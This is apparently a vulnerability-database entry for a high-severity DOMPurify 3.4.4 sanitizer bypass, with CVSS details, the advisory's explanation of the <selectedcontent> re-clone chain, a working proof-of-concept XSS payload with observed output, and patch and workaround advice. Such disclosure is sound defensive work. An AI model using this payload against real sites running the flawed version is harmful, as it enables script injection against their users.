Skip to main content

DOMPurify EUVDEUVD-2026-44443

| CVE-2026-47423 HIGH
Cross-site Scripting (XSS) (CWE-79)
2026-06-01 https://github.com/cure53/DOMPurify GHSA-87xg-pxx2-7hvx
8.2
CVSS 3.1 · Vendor: https://github.com/cure53/DOMPurify
Share

Severity by source

Vendor (https://github.com/cure53/DOMPurify) PRIMARY
8.2 HIGH
AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:L/A:N

Primary rating from Vendor (https://github.com/cure53/DOMPurify) · only source for this CVE.

CVSS VectorVendor: https://github.com/cure53/DOMPurify

CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:L/A:N
Attack Vector
Network
Attack Complexity
Low
Privileges Required
None
User Interaction
Required
Scope
Changed
Confidentiality
High
Integrity
Low
Availability
None

Lifecycle Timeline

3
Source Code Evidence Fetched
Jun 01, 2026 - 14:50 vuln.today
Analysis Generated
Jun 01, 2026 - 14:50 vuln.today
CVE Published
Jun 01, 2026 - 14:07 nvd
HIGH 8.2

Blast Radius

ecosystem impact
† from your stack dependencies † transitive graph · vuln.today resolves 4-path depth
  • 1 npm packages depend on dompurify (1 direct, 0 indirect)

Ecosystem-wide dependent count for version 3.4.4.

DescriptionCVE.org

Summary

DOMPurify 3.4.4 allows selectedcontent by default, allowing a chain in which browsers "re-clone" an XSS payload after sanitization, effectively bypassing DOMPurify.

Details

The chain is as follows:

  1. The browser parses the input and creates a <selectedcontent> clone from the selected <option>
  2. DOMPurify walks and sanitizes that generated clone.
  3. DOMPurify reaches the original <option> and removes selected=javascript:1
  4. The browser refreshes the <selectedcontent> clone from the original option's content.
  5. The refreshed clone is in a subtree DOMPurify already walked, which DOMPurify doesn't go back to sanitize
  6. The returned string contains unsanitized markup inside <selectedcontent>.

PoC

js
const dirty =
  '<select><button><selectedcontent></selectedcontent></button>' +
  '<option selected=javascript:1>' +
  '<img src=x onerror=alert(1)>x' +
  '</option></select>';

const clean = DOMPurify.sanitize(dirty);
console.log(clean);

document.body.innerHTML = clean;

Observed "sanitized" output in Chromium 148/WebKit 625:

html
<select><button><selectedcontent><img src="x" onerror="alert(1)">x</selectedcontent></button><option><img src="x">x</option></select>

After reinsertion, the browser updates the live DOM and strips the handler from the displayed clone, but the onerror has already fired:

html
<select><button><selectedcontent><img src="x">x</selectedcontent></button><option><img src="x">x</option></select>

Reproduced in Chromium and WebKit, but not Safari (not yet latest WebKit) or Firefox. Will likely change with browser support for selectedcontent.

Impact

This is a default-configuration DOMPurify sanitizer bypass resulting in XSS.

Applications are impacted if they sanitize attacker-controlled HTML with DOMPurify 3.4.4 using the string-input path and then insert the returned string into the page, for example with innerHTML.

AnalysisAI

Cross-site scripting via sanitizer bypass affects DOMPurify 3.4.4, the widely used npm HTML sanitization library maintained by cure53. The flaw stems from <selectedcontent> being permitted by default, allowing attackers to leverage browser re-cloning behavior so that an XSS payload is reinjected into a subtree DOMPurify has already walked. No public exploit identified at time of analysis in the form of in-the-wild attacks, but a fully working PoC is published in the GHSA advisory and active exploitation status is not listed in CISA KEV.

Technical ContextAI

DOMPurify is a JavaScript DOM-only XSS sanitizer for HTML, MathML, and SVG distributed via npm as dompurify. The vulnerability is a classic CWE-79 (Improper Neutralization of Input During Web Page Generation) realized through a parser-mutation race: the new HTML <selectedcontent> element (a live clone reflecting the currently selected <option> inside a customizable <select>) is rebuilt by the browser whenever the source option changes. DOMPurify walks the DOM tree once and removes the malicious selected=javascript:1 attribute on the original <option>, but that removal triggers the browser to refresh the <selectedcontent> subtree with the still-unsanitized <img onerror=...> markup from the option's children. Because the sanitizer does not revisit already-walked subtrees, the refreshed clone is serialized back into the returned string. The CPE pkg:npm/dompurify confirms the package scope is the npm distribution; the Chromium/WebKit-only reproduction reflects current browser support for selectedcontent.

RemediationAI

Vendor-released patch: upgrade dompurify from 3.4.4 to 3.4.5 or later via npm install dompurify@^3.4.5 (or the equivalent yarn/pnpm command) and redeploy bundles consuming the library; verify lockfiles and any vendored copies. Until patching is possible, deny selectedcontent explicitly through DOMPurify config (DOMPurify.sanitize(input, { FORBID_TAGS: ['selectedcontent'] })) or switch consumers to the DOM-returning path (RETURN_DOM_FRAGMENT: true) and insert the resulting nodes directly, which avoids re-serialization and the browser re-clone step - the trade-off is a code change at every call site and loss of string interoperability. Treating <select>/<option> content as untrusted via a stricter ALLOWED_TAGS allowlist is another compensating control, at the cost of breaking legitimate select dropdowns in user content. Refer to the GHSA advisory at https://github.com/cure53/DOMPurify/security/advisories/GHSA-87xg-pxx2-7hvx for the authoritative fix metadata.

CVE-2015-4495 HIGH POC
8.8 Aug 08

The PDF reader in Mozilla Firefox before 39.0.3, Firefox ESR 38.x before 38.1.1, and Firefox OS before 2.2 allows remote

CVE-2013-1690 HIGH POC
8.8 Jun 26

Mozilla Firefox before 22.0, Firefox ESR 17.x before 17.0.7, Thunderbird before 17.0.7, and Thunderbird ESR 17.x before

CVE-2013-0758 CRITICAL POC
9.3 Jan 13

Mozilla Firefox before 18.0, Firefox ESR 10.x before 10.0.12 and 17.x before 17.0.2, Thunderbird before 17.0.2, Thunderb

CVE-2013-0753 CRITICAL POC
9.3 Jan 13

Use-after-free vulnerability in the serializeToStream implementation in the XMLSerializer component in Mozilla Firefox b

CVE-2012-3993 CRITICAL POC
9.3 Oct 10

The Chrome Object Wrapper (COW) implementation in Mozilla Firefox before 16.0, Firefox ESR 10.x before 10.0.8, Thunderbi

CVE-2013-1710 CRITICAL POC
10.0 Aug 07

The crypto.generateCRMFRequest function in Mozilla Firefox before 23.0, Firefox ESR 17.x before 17.0.8, Thunderbird befo

CVE-2017-3823 HIGH POC
8.8 Feb 01

An issue was discovered in the Cisco WebEx Extension before 1.0.7 on Google Chrome, the ActiveTouch General Plugin Conta

CVE-2014-8636 HIGH POC
7.5 Jan 14

The XrayWrapper implementation in Mozilla Firefox before 35.0 and SeaMonkey before 2.32 does not properly interact with

CVE-2013-0757 CRITICAL POC
9.3 Jan 13

The Chrome Object Wrapper (COW) implementation in Mozilla Firefox before 18.0, Firefox ESR 17.x before 17.0.2, Thunderbi

CVE-2014-1510 CRITICAL POC
9.8 Mar 19

The Web IDL implementation in Mozilla Firefox before 28.0, Firefox ESR 24.x before 24.4, Thunderbird before 24.4, and Se

CVE-2014-1511 CRITICAL POC
9.8 Mar 19

Mozilla Firefox before 28.0, Firefox ESR 24.x before 24.4, Thunderbird before 24.4, and SeaMonkey before 2.25 allow remo

CVE-2013-0643 HIGH
8.8 Feb 27

The Firefox sandbox in Adobe Flash Player before 10.3.183.67 and 11.x before 11.6.602.171 on Windows and Mac OS X, and b

Share

EUVD-2026-44443 vulnerability details – vuln.today

This site uses cookies essential for authentication and security. No tracking or analytics cookies are used. Privacy Policy